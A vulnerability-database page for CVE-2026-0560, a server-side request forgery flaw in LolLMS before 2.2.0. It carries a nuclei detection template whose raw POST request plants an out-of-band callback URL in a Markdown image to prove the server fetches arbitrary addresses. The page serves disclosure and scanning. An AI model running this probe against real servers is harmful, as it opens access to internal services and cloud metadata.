Lucene search
K

LolLMS < 2.2.0 - Server-Side Request Forgery

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

LolLMS before 2.2.0 has SSRF in /api/files/export-content via unvalidated image URLs.

Related
Refs
Code
id: CVE-2026-0560

info:
  name: LolLMS < 2.2.0 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0. The /api/files/export-content endpoint processes Markdown image URLs by downloading them via _download_image_to_temp() in backend/routers/files.py without any validation, allowing an unauthenticated attacker to supply arbitrary URLs (e.g. cloud metadata endpoints or internal services) that the server will fetch, enabling internal network access, cloud metadata access, information disclosure, port scanning, and potentially remote code execution.
  impact: |
    Attackers can access internal network services, cloud metadata, and potentially execute remote code.
  remediation: |
    Update to version 2.2.0 or later.
  reference:
    - https://huntr.com/bounties/65e43a5e-b902-4369-b738-1825285a3ea5
    - https://nvd.nist.gov/vuln/detail/CVE-2026-0560
    - https://github.com/parisneo/lollms/commit/76a54f0df2df8a5b254aa627d487b5dc939a0263
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-0560
    epss-score: 0.01765
    epss-percentile: 0.75346
    cwe-id: CWE-918
  metadata:
    verified: false
    max-request: 1
    vendor: parisneo
    product: lollms
    shodan-query: http.title:"lollms"
  tags: cve,cve2026,ssrf,lollms,oast

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "LolLMS"
        internal: true
        case-insensitive: false

  - raw:
      - |
        POST /api/files/export-content HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"markdown_text":"# SSRF Test\n\n![ssrf](http://{{interactsh-url}}/ssrf-probe)\n","output_format":"docx"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100963bc292d6d8abbc6f23db01a40a05044109ce217a5ecfabaef9649dbc87a9e5022100f3a8a62ce92a09985fee67ce36e0894717cce839d54598d1b8f63ffe2c895e2b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Apr 2026 17:48Current
7.5High risk
Vulners AI Score7.5
CVSS 3.17.5
CVSS 37.5
EPSS0.01765
SSVC
19